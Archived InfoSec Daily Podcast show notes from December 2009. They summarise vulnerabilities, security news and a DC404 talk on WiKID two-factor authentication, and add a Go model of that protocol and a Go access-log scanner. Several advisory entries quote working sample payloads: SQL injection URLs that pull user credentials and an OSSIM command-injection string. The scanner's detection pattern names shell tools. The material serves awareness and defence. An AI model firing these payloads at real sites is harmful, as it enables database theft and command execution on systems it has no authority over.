  2. PHP is subject to an ‘open_basedir’ restriction-bypass vulnerability because of a design error. This vulnerability could be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. In such cases, ‘open_basedir’ restrictions are expected to isolate users from each other. PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be affected. Attackers may exploit these issues by crafting and executing standard PHP code. Exploits are available in the wild.
  3. HP Operations Manager is subject to a remote unauthorized-access vulnerability that could allow uploading and execution of code with SYSTEM-level permissions. Operations Manager 8.1 for Windows is vulnerable; other versions may also be vulnerable. Attackers can use readily available tools to exploit this issue. Core Security has a working commercial exploit for its CORE IMPACT product. Additionally, a working commercial exploit is available through VUPEN Security – Exploit and PoCs Service.
  4. The JEEMA Article Collection component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result in compromise of the application and access to or modification of data in the underlying database. URL example: http://www.example.com/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection
  5. Simple PHP Blog is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. This can be leveraged to obtain potentially sensitive information or to execute local scripts in the context of the webserver process. Additionally, this may allow a compromise of the application and the underlying computer; other attacks are also possible. Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected. Exploit code is available in the wild.
News Items of Interest:

News item 1: http://online.wsj.com/article/SB126102247889095011.html?mod=googlenews_wsj
The Wall Street Journal is reporting the insurgents in Iraq have been able to use $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones.  U.S. officials say there is no evidence that militants were able to take control of the drones or otherwise interfere with their flights. Still, the intercepts could give America’s enemies battlefield advantages by removing the element of surprise from certain missions and making it easier for insurgents to determine which roads and buildings are under U.S. surveillance.

The potential drone vulnerability lies in an unencrypted downlink between the unmanned craft and ground control. The U.S. government has known about the flaw since the U.S. campaign in Bosnia in the 1990s.

News item 2: http://blogs.computerworld.com/15234/google_ceo_if_you_want_privacy_do_you_have_something_to_hide
Apparently Google CEO Eric Schmidt, while appearing on CNBC, said: “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place,” suggesting that folks seeking privacy might not want to look to the Internet to find it.

EFF’s Richard Esguerra reminds us why we should care:

Schmidt’s statement makes it seem as if Google … is not even concerned enough to understand basic lessons about privacy and why it’s important. … Schmidt’s statement is painfully similar to the tired adage of pro-surveillance advocates that incorrectly presume that privacy’s only function is to obscure lawbreaking: “If you’ve done nothing wrong, you’ve got nothing to worry about.”

News item 3:  http://news.cnet.com/8301-13506_3-10416383-17.html?part=rss&subj=news&tag=2547-1_3-0-20

Career site Glassdoor.com has announced the employees’ choice awards for the top 50 best places to work. No tech companies made the top five, but according to Glassdoor, Southwest Airlines, General Mills, Slalom Consulting, Bain & Co., and McKinsey & Co. were the best places to work this year. Only General Mills and Bain & Co. were in the top five last year.

On the tech side, it was enterprise-solution provider Juniper Networks that led the way for the industry, placing 10th in the list with a 3.9 (out of 5) company rating from employees. Google placed 14th with a 3.9 rating, followed by NetApp, which also received a 3.9 rating. Last year, Google was ranked seventh on the list. NetApp was ranked 10th.

Some other tech notables from the list: Apple placed 22nd with a 3.8 company rating, which is a little lower than last year’s 19th place. Online career site CareerBuilder took the 26th spot with a 3.7 rating. The site experienced a steep decline, dropping eight spots from its 2008 ranking of 18th.

Companies that have offices in Atlanta:

News item 4: http://www.heraldtribune.com/article/20091223/ARTICLE/912231066?Title=U-S-faces-shortage-of-cyber-defenders

Apparently the federal government is struggling to fill a growing demand for skilled computer-security workers, from technicians to policy-makers, at a time when network attacks are rising in frequency and sophistication.

Demand is so intense that it has sparked a bidding war among agencies and contractors for a small pool of special talent: skilled technicians with security clearances. Their scarcity is driving up salaries, depriving agencies of skills, and in some cases affecting project quality.

News item 5: http://www.examiner.com/x-3693-NY-Internet-Examiner~y2009m12d23-Hackers-and-Spammers-Exploiting-Brittany-Murphys-Death?cid=channel-rss-Gadgets_and_Tech

The Examiner is reporting that less than 24 hours after Brittany Murphy’s sudden death, hackers and spammers had already begun using her name in poisoned search results and spam messages. They used SEO techniques to move their malicious links to the top of the search results for her name and keywords related to her and her death. When clicked, the links led to sites that attempted to download fake anti-virus software onto the visitor’s computer.

News item 6: http://www.networkworld.com/community/node/49237

Network World has an article on the Obama appointment of Howard Schmidt to become the nation’s first Cybersecurity Coordinator. Schmidt will report to the National Security Council (NSC) and National Economic Council (NEC).

The article asks whether Schmidt is the right person for this job. They state that Schmidt has experience at US-CERT, DHS, the U.S. Air Force, the White House, Microsoft, and eBay. He is also a well-respected father figure in the security industry. The article goes on to state that Schmidt must begin to address several major challenges such as:

1. Sophisticated adversaries. On the day that Schmidt was announced, the major security story centered on a multi-million dollar cybersecurity attack of Citigroup last summer. Citigroup is no security lightweight so if its systems can be compromised there are a lot of sitting ducks out there. Cyberwar is a real threat in the next decade.

2. A cybersecurity hot potato. As of this writing, there are a number of cybersecurity bills in committee and a lot of rhetoric on the Hill. Meanwhile, DHS, DOD, and NSA have complementary and competitive cybersecurity roles that need to be ironed out. There has also been massive spending on cybersecurity — some useful and some wasteful. We desperately need a non-elected leader to separate cybersecurity needs from politics and pork.

3. A real lack of knowledge. Cybersecurity knowledge is in short supply. Business guys know they need to do something but are unsure what to do. Technologists often look at security in myopic terms related to IT. Consumers haven’t a clue. We need a federally-driven education program that spans public awareness campaigns all the way through scholarships and continuing education.

DC404 Meeting report:
While at the DC404 meeting on Saturday, we were privileged to have Nick Owen, CEO of WiKID Systems, discuss his company’s product. Nick began by giving us an overview of how WiKID works: a user selects the domain they wish to use and enters their PIN into the WiKID two-factor client. The PIN is encrypted with the WiKID server’s public key, assuring that only that server can decrypt it with its private key. If the server can decrypt the PIN, the PIN is correct, and the account is active, it generates a one-time passcode (OTP) and encrypts it with the client’s public key. The user then enters their username and the OTP into whatever service they are using, a VPN for example, which forwards them to the WiKID server for validation.

He then touched on the operating systems WiKID supports, which include Windows, Mac, Linux, J2ME, PocketPC/SmartPhone/Windows Mobile and Blackberry. Finally, he discussed the network clients that WiKID supports, such as RADIUS, LDAP, and SSL via both a Java bean and a COM object. He also indicated that they have plug-ins for Juniper (formerly Funk) Steel Belted Radius and Citrix Web Interface.

Overall, WiKID looked interesting and is probably something that we should look into.
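As an added example, not WiKID’s own code or API and not from the podcast, the Go program below models the exchange Nick described: the client seals the PIN to the server’s public key, the server checks the PIN and that the account is active before sealing a one-time passcode to the client’s public key, and a relying service (the VPN) forwards username plus OTP to the server for validation. RSA-OAEP stands in for whatever encryption the product actually uses, the PIN is stored as a SHA-256 digest only for brevity, and the type and function names (`Server`, `FetchOTP`, and so on) are assumptions of this example.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
	"math/big"
)

// Constructed model of the WiKID exchange described in the meeting report. The
// names and types are this example's own, not WiKID's API; RSA-OAEP stands in for
// the product's public-key encryption.

type account struct {
	pinHash    [32]byte // a real server would use a slow password hash, not bare SHA-256
	active     bool
	clientPub  *rsa.PublicKey
	pendingOTP string // issued but not yet presented by a service; "" = none
}

// Server is the authentication server: its own key pair plus the account table.
type Server struct {
	key      *rsa.PrivateKey
	accounts map[string]*account
}

// NewKey generates a 2048-bit RSA key pair, used here for both server and clients.
func NewKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

func NewServer() *Server { return &Server{key: NewKey(), accounts: map[string]*account{}} }

// Register enrols a user: the server stores the PIN digest and the client's public key.
func (s *Server) Register(user, pin string, client *rsa.PrivateKey) {
	s.accounts[user] = &account{pinHash: sha256.Sum256([]byte(pin)), active: true, clientPub: &client.PublicKey}
}

// RequestOTP opens the PIN that was sealed to the server's public key, checks it and
// the account state, then returns a fresh eight-digit passcode sealed to the client.
func (s *Server) RequestOTP(user string, sealedPIN []byte) ([]byte, error) {
	a, ok := s.accounts[user]
	if !ok || !a.active {
		return nil, fmt.Errorf("%s: unknown or inactive account", user)
	}
	pin, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, s.key, sealedPIN, nil)
	if err != nil {
		return nil, fmt.Errorf("%s: PIN ciphertext was not sealed to this server", user)
	}
	if sha256.Sum256(pin) != a.pinHash {
		return nil, fmt.Errorf("%s: wrong PIN", user)
	}
	n, err := rand.Int(rand.Reader, big.NewInt(100000000))
	if err != nil {
		return nil, err
	}
	a.pendingOTP = fmt.Sprintf("%08d", n.Int64())
	return rsa.EncryptOAEP(sha256.New(), rand.Reader, a.clientPub, []byte(a.pendingOTP), nil)
}

// Validate is what the relying service (the VPN) calls with the username and OTP the
// user typed. A passcode is good once: it is cleared on any attempt, replayed or guessed.
func (s *Server) Validate(user, otp string) bool {
	a, ok := s.accounts[user]
	if !ok || !a.active || a.pendingOTP == "" {
		return false
	}
	good := subtle.ConstantTimeCompare([]byte(a.pendingOTP), []byte(otp)) == 1
	a.pendingOTP = ""
	return good
}

// FetchOTP is the client's side of the first two legs and returns the passcode the
// user will type, together with their username, into the VPN.
func FetchOTP(s *Server, client *rsa.PrivateKey, user, pin string) (string, error) {
	// Leg 1: the client (provisioned with the server's public key) seals the PIN.
	sealedPIN, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, &s.key.PublicKey, []byte(pin), nil)
	if err != nil {
		return "", err
	}
	sealedOTP, err := s.RequestOTP(user, sealedPIN)
	if err != nil {
		return "", err
	}
	// Leg 2: only the client's private key can open the passcode the server sent back.
	otp, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, client, sealedOTP, nil)
	return string(otp), err
}

func main() {
	s, client := NewServer(), NewKey()
	s.Register("alice", "4711", client)
	otp, err := FetchOTP(s, client, "alice", "4711")
	// Leg 3: the VPN forwards exactly the username + OTP pair to the server.
	fmt.Println(otp, err, s.Validate("alice", otp))
}
```

Because the server clears the pending passcode on the first validation attempt, a second presentation of the same OTP fails, a wrong PIN never yields a passcode at all, and a key pair the server has not enrolled cannot open the passcode even when the PIN is right; those three properties are what the model is meant to show.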

2009
12.22

InfoSec Daily Podcast


Tonight we are joined by a very special guest, Kevin Johnson from Inguardians. Kevin who is also affectionately known as the “Hacker Princess” gives us some insight into what it’s like to work at Inguardians with such luminaries as Ed Skoudis and Mike Poor.  We also get some information on his Social Network Security research and Samurai WTF.

Announcements:

Community SANS Atlanta 2010 Spring Schedule has been posted. There are 5 classes currently being offered. Leading off with Scott Moulton’s SEC606.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register by emailing sales@sans.org or by calling (301) 654-SANS(7267).

2009
12.21

ISD Episode 32

InfoSec Daily Podcast

Welcome to the InfoSec Podcast Episode 32 for December 18, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. For small and medium-sized businesses, when your systems are down the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.  There are 5 classes currently being offered.  Leading off with Scott Moulton’s SEC606.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register by emailing sales@sans.org or by calling (301) 654-SANS(7267).

Tonight we are joined by a very special guest, Rob Lee, Director at MANDIANT (http://www.mandiant.com/) as well as the Curriculum Lead for Digital Forensic Training at the SANS Institute (http://forensics.sans.org/).

2009
12.18

ISD Episode 31

InfoSec Daily Podcast

Community SANS Atlanta 2010 Spring Schedule has been posted.  There are 5 classes currently being offered.  Leading off with Scott Moulton’s SEC606.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register by emailing sales@sans.org or by calling (301) 654-SANS(7267).

DC404 meeting is this Saturday, December 19th @ 2PM at the Vortex Midtown. Nick Owen will be presenting on “WiKID Two-factor Auth and Securing Network Access with Open Source Solutions”. For more information and directions go to dc404.kaos.to or simply google DC404.
Vulnerabilities of Interest:

  1. Mozilla Firefox and SeaMonkey are affected by a spoofing vulnerability. An attacker could exploit this issue to place a legitimate-looking but invalid URL in the location bar and inject HTML and JavaScript into the body of the webpage. To exploit this issue, an attacker must entice an unsuspecting user to view a maliciously crafted web document.
  2. Xpdf is prone to multiple integer-overflow vulnerabilities. Exploiting these issues may allow remote attackers to execute arbitrary code in the context of an affected application or cause denial-of-service conditions. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service. A separate proof of concept is publicly available and known to be circulating in the wild.
  3. Winamp is prone to multiple integer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. These issues affect versions *prior to* Winamp 5.57. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service.
  4. Zen Cart is prone to a security vulnerability that may allow attackers to obtain sensitive information or delete the application’s database. An attacker can exploit this issue to view files in the context of the webserver process and delete the application’s database. Successful exploits may lead to further attacks. An attacker can exploit this issue via a browser.
  5. WHMCS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following is an example URL: http://www.example.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
  6. WP-Forum WordPress plugin is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to WP-Forum 2.4 are vulnerable. Attackers can use a browser to exploit these issues. The following URL strings are available:

    http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0

    http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0

    http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0

    http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1

    http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0

    http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1

    http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1

    Exploit code is available in the wild.

  7. OSSIM is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands because the application fails to adequately sanitize user-supplied input. Successful attacks can compromise the affected application and possibly the computer. These issues affect OSSIM 2.1.5; other versions may be affected as well. The following URL strings are available:

    http://www.example.com/ossim/sem/wcl.php?uniqueid=1;ls%20%3E%20/tmp/listing

    http://www.example.com/ossim/sem/storage_graphs.php?uniqueid=;ls%20%3E%20/tmp/listing;

    http://www.example.com/ossim/sem/storage_graphs2.php?uniqueid=;ls%20%3E%20/tmp/listing;

    http://www.example.com/ossim/sem/storage_graphs3.php?uniqueid=;ls%20%3E%20/tmp/listing;

    http://www.example.com/ossim/sem/storage_graphs4.php?uniqueid=;ls%20%3E%20/tmp/listing;

  8. Quick Heal AntiVirus is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges, resulting in a complete compromise of the affected computer. Quick Heal AntiVirus 2010 is vulnerable; other versions may also be affected. An attacker can use readily available command-line utilities to exploit this issue.
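Several of the entries above boil down to a hostile query string reaching the application: UNION/SELECT and boolean probes in the WHMCS and WP-Forum items (and the Joomla! one from the previous episode), and a shell separator followed by a command in the OSSIM item. Those same shapes are what a defender can look for in the front-end web server’s access log after the fact. The Go program below is an added example written for these notes, not code from the podcast or from any of the affected projects. It runs three such rules over constructed Combined Log Format lines (documentation-range client addresses carrying the request shapes quoted above) after decoding the query string and collapsing the `/**/` comment padding the way the target application would see it. The rule names and the `Finding` type are this example’s own.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// SampleLog is constructed Combined Log Format traffic for a fictional host
// (client addresses from the 203.0.113.0/24 documentation range). Lines 2, 3,
// 4 and 6 carry the request shapes quoted in the episode notes; lines 1 and 5
// are benign, and line 5 deliberately contains the word "union" so the rules
// have to do better than a bare keyword match.
const SampleLog = `203.0.113.5 - - [23/Dec/2009:10:15:02 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Dec/2009:10:15:09 -0500] "GET /index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Dec/2009:10:15:21 -0500] "GET /blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.8 - - [23/Dec/2009:10:16:02 -0500] "GET /ossim/sem/wcl.php?uniqueid=1;ls%20%3E%20/tmp/listing HTTP/1.1" 200 118 "-" "curl/7.19.7"
203.0.113.5 - - [23/Dec/2009:10:16:40 -0500] "GET /search.php?q=union+station+hours HTTP/1.1" 200 2230 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Dec/2009:10:17:03 -0500] "GET /weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user HTTP/1.1" 200 7730 "-" "Mozilla/5.0"`

// A rule is a named pattern applied to the decoded request target.
type rule struct {
	Name string
	Re   *regexp.Regexp
}

var rules = []rule{
	// UNION-based SQL injection: both keywords, close together, any case.
	{"sql-union-select", regexp.MustCompile(`(?i)\bunion\b.{0,40}\bselect\b`)},
	// Boolean (blind) SQL injection probes such as "and 1=0" / "or 1=1".
	{"sql-boolean-probe", regexp.MustCompile(`(?i)\b(and|or)\s+\d+\s*=\s*\d+`)},
	// A shell separator followed by a command name: OS command injection.
	{"os-command-injection", regexp.MustCompile(`[;|]\s*(ls|cat|id|uname|wget|curl|sh|bash)\b`)},
}

// Finding records one rule hit on one log line.
type Finding struct {
	LineNo int
	Rule   string
	Target string
}

// requestTarget extracts the request-target from a CLF line and decodes the
// query string the way the application would see it: percent-escapes and '+'
// become characters, and the /**/ comment stutter used to pad keywords apart
// collapses to a space. The second result is false for lines with no request.
func requestTarget(line string) (string, bool) {
	open := strings.Index(line, `"`)
	if open < 0 {
		return "", false
	}
	end := strings.Index(line[open+1:], `"`)
	if end < 0 {
		return "", false
	}
	fields := strings.Fields(line[open+1 : open+1+end]) // method, target, protocol
	if len(fields) < 2 {
		return "", false
	}
	parts := strings.SplitN(fields[1], "?", 2)
	if len(parts) == 1 {
		return parts[0], true
	}
	query := parts[1]
	if decoded, err := url.QueryUnescape(query); err == nil {
		query = decoded // a malformed escape leaves the raw query in place rather than dropping the line
	}
	return parts[0] + "?" + strings.ReplaceAll(query, "/**/", " "), true
}

// Scan runs every rule over every line and returns the hits in log order.
func Scan(logText string) []Finding {
	var found []Finding
	sc := bufio.NewScanner(strings.NewReader(logText))
	for n := 1; sc.Scan(); n++ {
		target, ok := requestTarget(sc.Text())
		if !ok {
			continue
		}
		for _, r := range rules {
			if r.Re.MatchString(target) {
				found = append(found, Finding{n, r.Name, target})
			}
		}
	}
	return found
}

func main() {
	for _, f := range Scan(SampleLog) {
		fmt.Printf("line %d  %-20s %s\n", f.LineNo, f.Rule, f.Target)
	}
}
```

Run it with `go run` to print the four hits; the benign line 5 produces none, which is the point of requiring both SQL keywords close together rather than flagging the word "union" on its own. In a real deployment the same `Scan` would be fed from the web server’s access log and the command-name list tuned to what the host actually has installed.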
News Items of Interest:

News item 1: http://www.neowin.net/news/main/09/12/16/us-and-russia-hold-secret-talks-on-fighting-cyber-crime?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+neowin-main+(Neowin.net+Main+News)
An update to the news item we had on the U.S. joining the UN talks on cybersecurity: the U.S. has apparently also been in secret talks with Russia. This may be directly related to the Albert Gonzalez attacks involving Russian citizens.

News item 2: http://www.csoonline.com/article/511269/Hackers_Take_Twitter_Offline_Again?source=rss_news
Twitter went offline for a while Friday after hackers calling themselves the Iranian Cyber Army apparently managed to change DNS records, redirecting traffic to another Web page. Whether Iranian hackers were responsible for the attack wasn’t immediately clear. However, Twitter and other Internet sites have been used by Iranian opposition groups and protestors to share details of anti-government protests in that country.

Twitter blamed the outage on changes made to the company’s DNS (Domain Name System) records, which match the company’s domain name with the IP addresses of its servers.

“Twitter’s DNS records were temporarily compromised but have now been fixed. We are looking into the underlying cause and will update with more information soon,” Twitter said on its Twitter Status page.

News item 3: http://government.zdnet.com/?p=6507
According to Doug Hanchard at ZDNet, regulators such as the CRTC, Ofcom and the FCC should be concerned with the opening up of wireless phone operating systems. The article goes on to argue that there should be a set of standards and verification tools that regulators use to verify software code on a phone, and that it must be LOCKED DOWN prior to release. Because a wireless phone has access to both communications platforms, the public switched telephone network (PSTN) and the Internet, the danger is significant and no software application should be released without vetting its ability to withstand attacks to and from the user’s device. There is a genuine threat to the national security of every country’s phone network. There should be penalties for software applications that create vulnerabilities impacting the telephone network.

News item 4:  http://www.theregister.co.uk/2009/11/11/hooksafe_rootkit_protection/
Researchers at North Carolina State University and a researcher from Microsoft released a hypervisor-based system called “HookSafe.” http://www.sigsac.org/ccs/CCS2009/techprogram.shtml (Session 17). HookSafe relocates kernel hooks in a guest to a page-aligned memory space. HookSafe successfully prevented nine “real-world” rootkits targeting an Ubuntu 8.04 guest with only a 6% reduction in performance benchmarks. In the test, HookSafe achieves this protection by relocating 5.881 kernel hooks across 41 physical pages, some of them in the dynamic kernel heap. Their paper: http://discovery.csc.ncsu.edu/pubs/ccs09-HookSafe.pdf Notes: By leveraging hardware-based virtualization support to intercept and validate write attempts to hardware registers, HookSafe has hardware register protection capabilities, which in turn defeat attempts to overwrite HookSafe’s protected memory. The paper assumes that the system is trusted at boot, that a trustworthy hypervisor can subsequently be securely loaded, and that the runtime integrity of the hypervisor is maintained. So while HookSafe can potentially resolve and protect the kernel hooks that it relocates, it doesn’t address VMBRs (Virtual Machine Based Rootkits) or SMBRs (System Management Mode Based Rootkits). Check out the Press and Resources sections over at http://invisiblethingslab.com for more information on VMBRs and SMBRs. BlackHat paper from ’08 on SMM Rootkits: http://www.eecs.ucf.edu/~czou/research/SMM-Rootkits-Securecom08.pdf. For information on VMBRs, you might want to check out SubVirt (remember the “Blue Pill” discussions?).

News item 5: http://blog.seattlepi.com/microsoft/archives/188706.asp
Anti-COFEE tool DECAF revealed as spoof.  Two developers said they created a tool, called DECAF, that compromises Microsoft’s COFEE computer-forensics tool by killing its processes, disabling a computer’s connection ports and even conjuring up fake MAC addresses.

It’s fake.

The developers posted an explanatory video, highlighted DECAF’s supposed features, promised pie-in-the-sky updates (such as the ability to send DECAF a text message to trigger “Lockdown Mode”) and appealed to expert developers for help in making better forensics tools.